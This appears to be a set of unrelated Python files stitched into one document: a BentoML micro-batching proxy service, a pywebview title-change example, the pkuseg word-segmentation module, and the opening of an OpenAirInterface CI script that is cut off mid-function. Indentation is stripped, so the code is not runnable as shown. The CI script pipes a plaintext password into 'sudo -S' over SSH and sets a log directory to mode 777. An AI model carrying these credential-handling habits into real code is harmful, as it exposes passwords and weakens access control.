import aiohttp.web
import psutil
from dependency_injector.wiring import Provide, inject
from bentoml.configuration.containers import BentoMLContainer
from bentoml.exceptions import RemoteException
from bentoml.marshal.dispatcher import CorkDispatcher, NonBlockSema
from bentoml.marshal.utils import DataLoader, MARSHAL_REQUEST_HEADER
from bentoml.saved_bundle import load_bento_service_metadata
from bentoml.saved_bundle.config import DEFAULT_MAX_BATCH_SIZE, DEFAULT_MAX_LATENCY
from bentoml.tracing import get_tracer
from bentoml.types import HTTPRequest, HTTPResponse
logger = logging.getLogger(__name__)
def metrics_patch(cls):
class _MarshalService(cls):
@inject
def __init__(
self,
*args,
namespace: str = Provide[
BentoMLContainer.config.bento_server.metrics.namespace
],
**kwargs,
):
for attr_name in functools.WRAPPER_ASSIGNMENTS:
try:
setattr(self.__class__, attr_name, getattr(cls, attr_name))
except AttributeError:
pass
from prometheus_client import Counter, Gauge, Histogram
super(_MarshalService, self).__init__(*args, **kwargs)
# its own namespace?
service_name = self.bento_service_metadata_pb.name
self.metrics_request_batch_size = Histogram(
name=service_name + '_mb_batch_size',
documentation=service_name + "microbatch request batch size",
namespace=namespace,
labelnames=['endpoint'],
)
self.metrics_request_duration = Histogram(
name=service_name + '_mb_requestmb_duration_seconds',
documentation=service_name + "API HTTP request duration in seconds",
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
self.metrics_request_in_progress = Gauge(
name=service_name + "_mb_request_in_progress",
documentation='Total number of HTTP requests in progress now',
namespace=namespace,
labelnames=['endpoint', 'http_method'],
)
self.metrics_request_exception = Counter(
name=service_name + "_mb_request_exception",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'exception_class'],
)
self.metrics_request_total = Counter(
name=service_name + "_mb_request_total",
documentation='Total number of service exceptions',
namespace=namespace,
labelnames=['endpoint', 'http_response_code'],
)
async def request_dispatcher(self, request):
func = super(_MarshalService, self).request_dispatcher
api_route = request.match_info.get("path", "/")
_metrics_request_in_progress = self.metrics_request_in_progress.labels(
endpoint=api_route, http_method=request.method,
)
_metrics_request_in_progress.inc()
time_st = time.time()
try:
resp = await func(request)
except asyncio.CancelledError:
resp = aiohttp.web.Response(status=503)
except Exception as e: # pylint: disable=broad-except
self.metrics_request_exception.labels(
endpoint=api_route, exception_class=e.__class__.__name__
).inc()
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(status=500)
self.metrics_request_total.labels(
endpoint=api_route, http_response_code=resp.status
).inc()
self.metrics_request_duration.labels(
endpoint=api_route, http_response_code=resp.status
).observe(time.time() - time_st)
_metrics_request_in_progress.dec()
return resp
async def _batch_handler_template(self, requests, api_route):
func = super(_MarshalService, self)._batch_handler_template
self.metrics_request_batch_size.labels(endpoint=api_route).observe(
len(requests)
)
return await func(requests, api_route)
return _MarshalService
@metrics_patch
class MarshalService:
"""
MarshalService creates a reverse proxy server in front of actual API server,
implementing the micro batching feature.
It wait a short period and packed multiple requests in a single batch
before sending to the API server.
It applied an optimized CORK algorithm to get best efficiency.
"""
@inject
def __init__(
self,
bento_bundle_path,
outbound_host="localhost",
outbound_port=None,
outbound_workers: int = Provide[BentoMLContainer.api_server_workers],
mb_max_batch_size: int = Provide[
BentoMLContainer.config.bento_server.microbatch.max_batch_size
],
mb_max_latency: int = Provide[
BentoMLContainer.config.bento_server.microbatch.max_latency
],
max_request_size: int = Provide[
BentoMLContainer.config.bento_server.max_request_size
],
outbound_unix_socket: str = None,
enable_microbatch: bool = Provide[
BentoMLContainer.config.bento_server.microbatch.enabled
],
):
self._client = None
self.outbound_unix_socket = outbound_unix_socket
self.outbound_host = outbound_host
self.outbound_port = outbound_port
self.outbound_workers = outbound_workers
self.mb_max_batch_size = mb_max_batch_size
self.mb_max_latency = mb_max_latency
self.batch_handlers = dict()
self._outbound_sema = None # the semaphore to limit outbound connections
self.max_request_size = max_request_size
self.bento_service_metadata_pb = load_bento_service_metadata(bento_bundle_path)
if enable_microbatch:
self.setup_routes_from_pb(self.bento_service_metadata_pb)
if psutil.POSIX:
import resource
self.CONNECTION_LIMIT = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
self.CONNECTION_LIMIT = 1024
logger.info(
"Your system nofile limit is %d, which means each instance of microbatch "
"service is able to hold this number of connections at same time. "
"You can increase the number of file descriptors for the server process, "
"or launch more microbatch instances to accept more concurrent connection.",
self.CONNECTION_LIMIT,
)
def set_outbound_port(self, outbound_port):
self.outbound_port = outbound_port
def fetch_sema(self):
if self._outbound_sema is None:
self._outbound_sema = NonBlockSema(self.outbound_workers)
return self._outbound_sema
def get_client(self):
if self._client is None:
jar = aiohttp.DummyCookieJar()
if self.outbound_unix_socket:
conn = aiohttp.UnixConnector(path=self.outbound_unix_socket,)
else:
conn = aiohttp.TCPConnector(limit=30)
self._client = aiohttp.ClientSession(
connector=conn, auto_decompress=False, cookie_jar=jar,
)
return self._client
def __del__(self):
if getattr(self, '_client', None) is not None and not self._client.closed:
self._client.close()
def add_batch_handler(self, api_route, max_latency, max_batch_size):
'''
Params:
* max_latency: limit the max latency of overall request handling
* max_batch_size: limit the max batch size for handler
** marshal server will give priority to meet these limits than efficiency
'''
if api_route not in self.batch_handlers:
_func = CorkDispatcher(
max_latency,
max_batch_size,
shared_sema=self.fetch_sema(),
fallback=aiohttp.web.HTTPTooManyRequests,
)(functools.partial(self._batch_handler_template, api_route=api_route))
self.batch_handlers[api_route] = _func
def setup_routes_from_pb(self, bento_service_metadata_pb):
for api_pb in bento_service_metadata_pb.apis:
if api_pb.batch:
max_latency = (
self.mb_max_latency or api_pb.mb_max_latency or DEFAULT_MAX_LATENCY
)
max_batch_size = (
self.mb_max_batch_size
or api_pb.mb_max_batch_size
or DEFAULT_MAX_BATCH_SIZE
)
self.add_batch_handler(api_pb.route, max_latency, max_batch_size)
logger.info(
"Micro batch enabled for API `%s` max-latency: %s"
" max-batch-size %s",
api_pb.route,
max_latency,
max_batch_size,
)
async def request_dispatcher(self, request):
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name="[1]http request",
is_root=True,
standalone=True,
sample_rate=0.001,
):
api_route = request.match_info.get("path")
if api_route in self.batch_handlers:
req = HTTPRequest(
tuple((k.decode(), v.decode()) for k, v in request.raw_headers),
await request.read(),
)
try:
resp = await self.batch_handlers[api_route](req)
except RemoteException as e:
# known remote exception
logger.error(traceback.format_exc())
resp = aiohttp.web.Response(
status=e.payload.status,
headers=e.payload.headers,
body=e.payload.body,
)
except Exception: # pylint: disable=broad-except
logger.error(traceback.format_exc())
resp = aiohttp.web.HTTPInternalServerError()
else:
resp = await self.relay_handler(request)
return resp
async def relay_handler(self, request):
data = await request.read()
url = request.url.with_host(self.outbound_host).with_port(self.outbound_port)
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]{url.path} relay",
request_headers=request.headers,
):
try:
client = self.get_client()
async with client.request(
request.method, url, data=data, headers=request.headers
) as resp:
body = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError:
return aiohttp.web.Response(status=503, body=b"Service Unavailable")
return aiohttp.web.Response(
status=resp.status, body=body, headers=resp.headers,
)
async def _batch_handler_template(self, requests, api_route):
'''
batch request handler
params:
* requests: list of aiohttp request
* api_route: called API name
raise:
* RemoteException: known exceptions from model server
* Exception: other exceptions
'''
headers = {MARSHAL_REQUEST_HEADER: "true"}
api_url = f"http://{self.outbound_host}:{self.outbound_port}/{api_route}"
with get_tracer().async_span(
service_name=self.__class__.__name__,
span_name=f"[2]merged {api_route}",
request_headers=headers,
):
reqs_s = DataLoader.merge_requests(requests)
try:
client = self.get_client()
async with client.post(api_url, data=reqs_s, headers=headers) as resp:
raw = await resp.read()
except aiohttp.client_exceptions.ClientConnectionError as e:
raise RemoteException(
e, payload=HTTPResponse(status=503, body=b"Service Unavailable")
)
if resp.status != 200:
raise RemoteException(
f"Bad response status from model server:\n{resp.status}\n{raw}",
payload=HTTPResponse(
status=resp.status,
headers=tuple(resp.headers.items()),
body=raw,
),
)
merged = DataLoader.split_responses(raw)
return tuple(
aiohttp.web.Response(
body=i.body, headers=i.headers, status=i.status or 500
)
for i in merged
)
def async_start(self, port):
"""
Start an micro batch server at the specific port on the instance or parameter.
"""
marshal_proc = multiprocessing.Process(
target=self.fork_start_app, kwargs=dict(port=port), daemon=True,
)
marshal_proc.start()
logger.info("Running micro batch service on :%d", port)
def make_app(self):
app = aiohttp.web.Application(client_max_size=self.max_request_size)
app.router.add_view("/", self.relay_handler)
app.router.add_view("/{path:.*}", self.request_dispatcher)
return app
@inject
def fork_start_app(
self, port=Provide[BentoMLContainer.config.bento_server.port],
):
# Use new eventloop in the fork process to avoid problems on MacOS
# ref: https://groups.google.com/forum/#!topic/python-tornado/DkXjSNPCzsI
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
app = self.make_app()
aiohttp.web.run_app(app, port=port)
|
window_title_change.py
|
import webview
import threading
import time
'''
This example demonstrates how to change a window title.
'''
def change_title():
"""changes title every 3 seconds"""
for i in range(1, 100):
time.sleep(3)
webview.set_title("New Title #{}".format(i))
if __name__ == '__main__':
t = threading.Thread(target=change_title)
t.start()
webview.create_window('First Tile',
'http://www.flowrl.com',
width=800, height=600,
resizable=True)
|
__init__.py
|
from __future__ import print_function
import sys
if sys.version_info[0] < 3:
print("pkuseg does not support python2", file=sys.stderr)
sys.exit(1)
import os
import time
import pickle as pkl
import multiprocessing
from multiprocessing import Process, Queue
import pkuseg.trainer as trainer
import pkuseg.inference as _inf
from pkuseg.config import config
from pkuseg.feature_extractor import FeatureExtractor
from pkuseg.model import Model
from pkuseg.download import download_model
from pkuseg.postag import Postag
class TrieNode:
"""建立词典的Trie树节点"""
def __init__(self, isword):
self.isword = isword
self.children = {}
class Preprocesser:
"""预处理器,在用户词典中的词强制分割"""
def __init__(self, dict_file):
"""初始化建立Trie树"""
if dict_file is None:
dict_file = []
self.dict_data = dict_file
if isinstance(dict_file, str):
with open(dict_file, encoding="utf-8") as f:
lines = f.readlines()
self.trie = TrieNode(False)
for line in lines:
self.insert(line.strip())
else:
self.trie = TrieNode(False)
for w in dict_file:
assert isinstance(w, str)
self.insert(w.strip())
def insert(self, word):
"""Trie树中插入单词"""
l = len(word)
now = self.trie
for i in range(l):
c = word[i]
if not c in now.children:
now.children[c] = TrieNode(False)
now = now.children[c]
now.isword = True
def solve(self, txt):
"""对文本进行预处理"""
outlst = []
iswlst = []
l = len(txt)
last = 0
i = 0
while i < l:
now = self.trie
j = i
found = False
while True:
c = txt[j]
if not c in now.children:
break
now = now.children[c]
j += 1
if now.isword:
found = True
break
if j == l:
break
if found:
if last != i:
outlst.append(txt[last:i])
iswlst.append(False)
outlst.append(txt[i:j])
iswlst.append(True)
last = j
i = j
else:
i += 1
if last < l:
outlst.append(txt[last:l])
iswlst.append(False)
return outlst, iswlst
class Postprocesser:
"""对分词结果后处理"""
def __init__(self, common_name, other_names):
if common_name is None and other_names is None:
self.do_process = False
return
self.do_process = True
if common_name is None:
self.common_words = set()
else:
# with open(common_name, encoding='utf-8') as f:
# lines = f.readlines()
# self.common_words = set(map(lambda x:x.strip(), lines))
with open(common_name, "rb") as f:
all_words = pkl.load(f).strip().split("\n")
self.common_words = set(all_words)
if other_names is None:
self.other_words = set()
else:
self.other_words = set()
for other_name in other_names:
# with open(other_name, encoding='utf-8') as f:
# lines = f.readlines()
# self.other_words.update(set(map(lambda x:x.strip(), lines)))
with open(other_name, "rb") as f:
all_words = pkl.load(f).strip().split("\n")
self.other_words.update(set(all_words))
def post_process(self, sent, check_seperated):
for m in reversed(range(2, 8)):
end = len(sent)-m
if end < 0:
continue
i = 0
while (i < end + 1):
merged_words = ''.join(sent[i:i+m])
if merged_words in self.common_words:
do_seg = True
elif merged_words in self.other_words:
if check_seperated:
seperated = all(((w in self.common_words)
or (w in self.other_words)) for w in sent[i:i+m])
else:
seperated = False
if seperated:
do_seg = False
else:
do_seg = True
else:
do_seg = False
if do_seg:
for k in range(m):
del sent[i]
sent.insert(i, merged_words)
i += 1
end = len(sent) - m
else:
i += 1
return sent
def __call__(self, sent):
if not self.do_process:
return sent
return self.post_process(sent, check_seperated=True)
class pkuseg:
def __init__(self, model_name="default", user_dict="default", postag=False):
"""初始化函数,加载模型及用户词典"""
# print("loading model")
# config = Config()
# self.config = config
self.postag = postag
if model_name in ["default"]:
config.modelDir = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"models",
model_name,
)
elif model_name in config.available_models:
config.modelDir = os.path.join(
config.pkuseg_home,
model_name,
)
download_model(config.model_urls[model_name], config.pkuseg_home, config.model_hash[model_name])
else:
config.modelDir = model_name
# config.fModel = os.path.join(config.modelDir, "model.txt")
if user_dict is None:
file_name = None
other_names = None
else:
if user_dict not in config.available_models:
file_name = user_dict
else:
file_name = None
if model_name in config.models_with_dict:
other_name = os.path.join(
config.pkuseg_home,
model_name,
model_name+"_dict.pkl",
)
default_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.pkl",
)
other_names = [other_name, default_name]
else:
default_name = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"dicts", "default.pkl",
)
other_names = [default_name]
self.preprocesser = Preprocesser(file_name)
# self.preprocesser = Preprocesser([])
self.postprocesser = Postprocesser(None, other_names)
self.feature_extractor = FeatureExtractor.load()
self.model = Model.load()
self.idx_to_tag = {
idx: tag for tag, idx in self.feature_extractor.tag_to_idx.items()
}
self.n_feature = len(self.feature_extractor.feature_to_idx)
self.n_tag = len(self.feature_extractor.tag_to_idx)
if postag:
download_model(config.model_urls["postag"], config.pkuseg_home, config.model_hash["postag"])
postag_dir = os.path.join(
config.pkuseg_home,
"postag",
)
self.tagger = Postag(postag_dir)
# print("finish")
def _cut(self, text):
"""
直接对文本分词
"""
examples = list(self.feature_extractor.normalize_text(text))
length = len(examples)
all_feature = [] # type: List[List[int]]
for idx in range(length):
node_feature_idx = self.feature_extractor.get_node_features_idx(
idx, examples
)
# node_feature = self.feature_extractor.get_node_features(
# idx, examples
# )
# node_feature_idx = []
# for feature in node_feature:
# feature_idx = self.feature_extractor.feature_to_idx.get(feature)
# if feature_idx is not None:
# node_feature_idx.append(feature_idx)
# if not node_feature_idx:
# node_feature_idx.append(0)
all_feature.append(node_feature_idx)
_, tags = _inf.decodeViterbi_fast(all_feature, self.model)
words = []
current_word = None
is_start = True
for tag, char in zip(tags, text):
if is_start:
current_word = char
is_start = False
elif "B" in self.idx_to_tag[tag]:
words.append(current_word)
current_word = char
else:
current_word += char
if current_word:
words.append(current_word)
return words
def cut(self, txt):
"""分词,结果返回一个list"""
txt = txt.strip()
ret = []
if not txt:
return ret
imary = txt.split() # 根据空格分为多个片段
# 对每个片段分词
for w0 in imary:
if not w0:
continue
# 根据用户词典拆成更多片段
lst, isword = self.preprocesser.solve(w0)
for w, isw in zip(lst, isword):
if isw:
ret.append(w)
continue
output = self._cut(w)
ret.extend(self.postprocesser(output))
if self.postag:
tags = self.tagger.tag(ret)
ret = list(zip(ret, tags))
return ret
def train(trainFile, testFile, savedir, train_iter=20, init_model=None):
"""用于训练模型"""
# config = Config()
starttime = time.time()
if not os.path.exists(trainFile):
raise Exception("trainfile does not exist.")
if not os.path.exists(testFile):
raise Exception("testfile does not exist.")
if not os.path.exists(config.tempFile):
os.makedirs(config.tempFile)
if not os.path.exists(config.tempFile + "/output"):
os.mkdir(config.tempFile + "/output")
# config.runMode = "train"
config.trainFile = trainFile
config.testFile = testFile
config.modelDir = savedir
# config.fModel = os.path.join(config.modelDir, "model.txt")
config.nThread = 1
config.ttlIter = train_iter
config.init_model = init_model
os.makedirs(config.modelDir, exist_ok=True)
trainer.train(config)
# pkuseg.main.run(config)
# clearDir(config.tempFile)
print("Total time: " + str(time.time() - starttime))
def _test_single_proc(
input_file, output_file, model_name="default", user_dict="default", postag=False, verbose=False
):
times = []
times.append(time.time())
seg = pkuseg(model_name, user_dict, postag=postag)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
results = []
for line in lines:
if not postag:
results.append(" ".join(seg.cut(line)))
else:
results.append(" ".join(map(lambda x:"/".join(x), seg.cut(line))))
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(results))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = ["load_model", "read_file", "word_seg", "write_file"]
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def _proc_deprecated(seg, lines, start, end, q):
for i in range(start, end):
l = lines[i].strip()
ret = seg.cut(l)
q.put((i, " ".join(ret)))
def _proc(seg, in_queue, out_queue):
# TODO: load seg (json or pickle serialization) in sub_process
# to avoid pickle seg online when using start method other
# than fork
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
if not seg.postag:
output_str = " ".join(seg.cut(line))
else:
output_str = " ".join(map(lambda x:"/".join(x), seg.cut(line)))
out_queue.put((idx, output_str))
def _proc_alt(model_name, user_dict, postag, in_queue, out_queue):
seg = pkuseg(model_name, user_dict, postag=postag)
while True:
item = in_queue.get()
if item is None:
return
idx, line = item
if not postag:
output_str = " ".join(seg.cut(line))
else:
output_str = " ".join(map(lambda x:"/".join(x), seg.cut(line)))
out_queue.put((idx, output_str))
def _test_multi_proc(
input_file,
output_file,
nthread,
model_name="default",
user_dict="default",
postag=False,
verbose=False,
):
alt = multiprocessing.get_start_method() == "spawn"
times = []
times.append(time.time())
if alt:
seg = None
else:
seg = pkuseg(model_name, user_dict, postag)
times.append(time.time())
if not os.path.exists(input_file):
raise Exception("input_file {} does not exist.".format(input_file))
with open(input_file, "r", encoding="utf-8") as f:
lines = f.readlines()
times.append(time.time())
in_queue = Queue()
out_queue = Queue()
procs = []
for _ in range(nthread):
if alt:
p = Process(
target=_proc_alt,
args=(model_name, user_dict, postag, in_queue, out_queue),
)
else:
p = Process(target=_proc, args=(seg, in_queue, out_queue))
procs.append(p)
for idx, line in enumerate(lines):
in_queue.put((idx, line))
for proc in procs:
in_queue.put(None)
proc.start()
times.append(time.time())
result = [None] * len(lines)
for _ in result:
idx, line = out_queue.get()
result[idx] = line
times.append(time.time())
for p in procs:
p.join()
times.append(time.time())
with open(output_file, "w", encoding="utf-8") as f:
f.write("\n".join(result))
times.append(time.time())
print("total_time:\t{:.3f}".format(times[-1] - times[0]))
if verbose:
time_strs = [
"load_model",
"read_file",
"start_proc",
"word_seg",
"join_proc",
"write_file",
]
if alt:
times = times[1:]
time_strs = time_strs[1:]
time_strs[2] = "load_modal & word_seg"
for key, value in zip(
time_strs,
[end - start for start, end in zip(times[:-1], times[1:])],
):
print("{}:\t{:.3f}".format(key, value))
def test(
input_file,
output_file,
model_name="default",
user_dict="default",
nthread=10,
postag=False,
verbose=False,
):
if nthread > 1:
_test_multi_proc(
input_file, output_file, nthread, model_name, user_dict, postag, verbose
)
else:
_test_single_proc(
input_file, output_file, model_name, user_dict, postag, verbose
)
|
main.py
|
#/*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
ENB_PROCESS_FAILED = -1
ENB_PROCESS_OK = +1
ENB_PROCESS_SEG_FAULT = -11
ENB_PROCESS_ASSERTION = -12
ENB_PROCESS_REALTIME_ISSUE = -13
ENB_PROCESS_NOLOGFILE_TO_ANALYZE = -14
HSS_PROCESS_FAILED = -2
HSS_PROCESS_OK = +2
MME_PROCESS_FAILED = -3
MME_PROCESS_OK = +3
SPGW_PROCESS_FAILED = -4
SPGW_PROCESS_OK = +4
UE_IP_ADDRESS_ISSUE = -5
#-----------------------------------------------------------
# Import
#-----------------------------------------------------------
import sys # arg
import re # reg
import pexpect # pexpect
import time # sleep
import os
import subprocess
import xml.etree.ElementTree as ET
import logging
import datetime
import signal
from multiprocessing import Process, Lock, SimpleQueue
logging.basicConfig(
level=logging.DEBUG,
format="[%(asctime)s] %(name)s:%(levelname)s: %(message)s"
)
#-----------------------------------------------------------
# Class Declaration
#-----------------------------------------------------------
class SSHConnection():
def __init__(self):
self.eNBIPAddress = ''
self.eNBRepository = ''
self.eNBBranch = ''
self.eNB_AllowMerge = False
self.eNBCommitID = ''
self.eNBTargetBranch = ''
self.eNBUserName = ''
self.eNBPassword = ''
self.eNBSourceCodePath = ''
self.EPCIPAddress = ''
self.EPCUserName = ''
self.EPCPassword = ''
self.EPCSourceCodePath = ''
self.EPCType = ''
self.ADBIPAddress = ''
self.ADBUserName = ''
self.ADBPassword = ''
self.testCase_id = ''
self.testXMLfiles = []
self.nbTestXMLfiles = 0
self.desc = ''
self.Build_eNB_args = ''
self.Initialize_eNB_args = ''
self.eNBLogFile = ''
self.eNB_instance = ''
self.eNBOptions = ''
self.rruOptions = ''
self.ping_args = ''
self.ping_packetloss_threshold = ''
self.iperf_args = ''
self.iperf_packetloss_threshold = ''
self.iperf_profile = ''
self.nbMaxUEtoAttach = -1
self.UEDevices = []
self.CatMDevices = []
self.UEIPAddresses = []
self.htmlFile = ''
self.htmlHeaderCreated = False
self.htmlFooterCreated = False
self.htmlUEConnected = -1
self.htmleNBFailureMsg = ''
self.picocom_closure = False
self.idle_sleep_time = 0
self.htmlTabRefs = []
self.htmlTabNames = []
self.htmlTabIcons = []
self.finalStatus = False
self.eNBOsVersion = ''
self.eNBKernelVersion = ''
self.eNBUhdVersion = ''
self.eNBUsrpBoard = ''
self.eNBCpuNb = ''
self.eNBCpuModel = ''
self.eNBCpuMHz = ''
def open(self, ipaddress, username, password):
count = 0
connect_status = False
while count < 4:
self.ssh = pexpect.spawn('ssh', [username + '@' + ipaddress], timeout = 5)
self.sshresponse = self.ssh.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', 'Last login', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
self.ssh.sendline('yes')
self.ssh.expect('password:')
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 1:
self.ssh.sendline(password)
self.sshresponse = self.ssh.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
count = 10
connect_status = True
else:
logging.debug('self.sshresponse = ' + str(self.sshresponse))
elif self.sshresponse == 2:
# Checking if we are really on the remote client defined by its IP address
self.command('stdbuf -o0 ifconfig | egrep --color=never "inet addr:"', '\$', 5)
result = re.search(str(ipaddress), str(self.ssh.before))
if result is None:
self.close()
else:
count = 10
connect_status = True
else:
# debug output
logging.debug(str(self.ssh.before))
logging.debug('self.sshresponse = ' + str(self.sshresponse))
# adding a tempo when failure
if not connect_status:
time.sleep(1)
count += 1
if connect_status:
pass
else:
sys.exit('SSH Connection Failed')
def command(self, commandline, expectedline, timeout):
logging.debug(commandline)
self.ssh.timeout = timeout
self.ssh.sendline(commandline)
self.sshresponse = self.ssh.expect([expectedline, pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
return 0
elif self.sshresponse == 1:
logging.debug('\u001B[1;37;41m Unexpected EOF \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
elif self.sshresponse == 2:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
result = re.search('ping |iperf |picocom', str(commandline))
if result is None:
logging.debug(str(self.ssh.before))
sys.exit(self.sshresponse)
else:
return -1
else:
logging.debug('\u001B[1;37;41m Unexpected Others \u001B[0m')
logging.debug('Expected Line : ' + expectedline)
sys.exit(self.sshresponse)
def close(self):
self.ssh.timeout = 5
self.ssh.sendline('exit')
self.sshresponse = self.ssh.expect([pexpect.EOF, pexpect.TIMEOUT])
if self.sshresponse == 0:
pass
elif self.sshresponse == 1:
if not self.picocom_closure:
logging.debug('\u001B[1;37;41m Unexpected TIMEOUT during closing\u001B[0m')
else:
logging.debug('\u001B[1;37;41m Unexpected Others during closing\u001B[0m')
def copyin(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination)
while count < 10:
scp_spawn = pexpect.spawn('scp '+ username + '@' + ipaddress + ':' + source + ' ' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
return 0
else:
return -1
def copyout(self, ipaddress, username, password, source, destination):
count = 0
copy_status = False
logging.debug('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination)
while count < 4:
scp_spawn = pexpect.spawn('scp ' + source + ' ' + username + '@' + ipaddress + ':' + destination, timeout = 100)
scp_response = scp_spawn.expect(['Are you sure you want to continue connecting (yes/no)?', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
scp_spawn.sendline('yes')
scp_spawn.expect('password:')
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0:
count = 10
copy_status = True
else:
logging.debug('1 - scp_response = ' + str(scp_response))
elif scp_response == 1:
scp_spawn.sendline(password)
scp_response = scp_spawn.expect(['\$', 'Permission denied', 'password:', pexpect.EOF, pexpect.TIMEOUT])
if scp_response == 0 or scp_response == 3:
count = 10
copy_status = True
else:
logging.debug('2 - scp_response = ' + str(scp_response))
elif scp_response == 2:
count = 10
copy_status = True
else:
logging.debug('3 - scp_response = ' + str(scp_response))
# adding a tempo when failure
if not copy_status:
time.sleep(1)
count += 1
if copy_status:
pass
else:
sys.exit('SCP failed')
def BuildeNB(self):
if self.eNBIPAddress == '' or self.eNBRepository == '' or self.eNBBranch == '' or self.eNBUserName == '' or self.eNBPassword == '' or self.eNBSourceCodePath == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('mkdir -p ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('if [ ! -e .git ]; then stdbuf -o0 git clone ' + self.eNBRepository + ' .; else stdbuf -o0 git fetch; fi', '\$', 600)
# Raphael: here add a check if git clone or git fetch went smoothly
self.command('git config user.email "jenkins@openairinterface.org"', '\$', 5)
self.command('git config user.name "OAI Jenkins"', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S git clean -x -d -ff', '\$', 30)
# if the commit ID is provided use it to point to it
if self.eNBCommitID != '':
self.command('git checkout -f ' + self.eNBCommitID, '\$', 5)
# if the branch is not develop, then it is a merge request and we need to do
# the potential merge. Note that merge conflicts should already been checked earlier
if (self.eNB_AllowMerge):
if self.eNBTargetBranch == '':
if (self.eNBBranch != 'develop') and (self.eNBBranch != 'origin/develop'):
self.command('git merge --ff origin/develop -m "Temporary merge for CI"', '\$', 5)
else:
logging.debug('Merging with the target branch: ' + self.eNBTargetBranch)
self.command('git merge --ff origin/' + self.eNBTargetBranch + ' -m "Temporary merge for CI"', '\$', 5)
self.command('source oaienv', '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('mkdir -p log', '\$', 5)
self.command('chmod 777 log', '\$', 5)
# no need to remove in log (git clean did the trick)
self.command('stdbuf -o0 ./build_oai ' + self.Build_eNB_args + ' 2>&1 | stdbuf -o0 tee -a compile_oai_enb.log', 'Bypassing the Tests', 600)
self.command('mkdir -p build_log_' + self.testCase_id, '\$', 5)
self.command('mv log/* ' + 'build_log_' + self.testCase_id, '\$', 5)
self.command('mv compile_oai_enb.log ' + 'build_log_' + self.testCase_id, '\$', 5)
# Workaround to run with develop-nr
self.command('if [ -e ran_build ]; then cp -rf ran_build lte_build_oai; fi', '\$', 30)
self.close()
self.CreateHtmlTestRow(self.Build_eNB_args, 'OK', ALL_PROCESSES_OK)
def InitializeHSS(self):
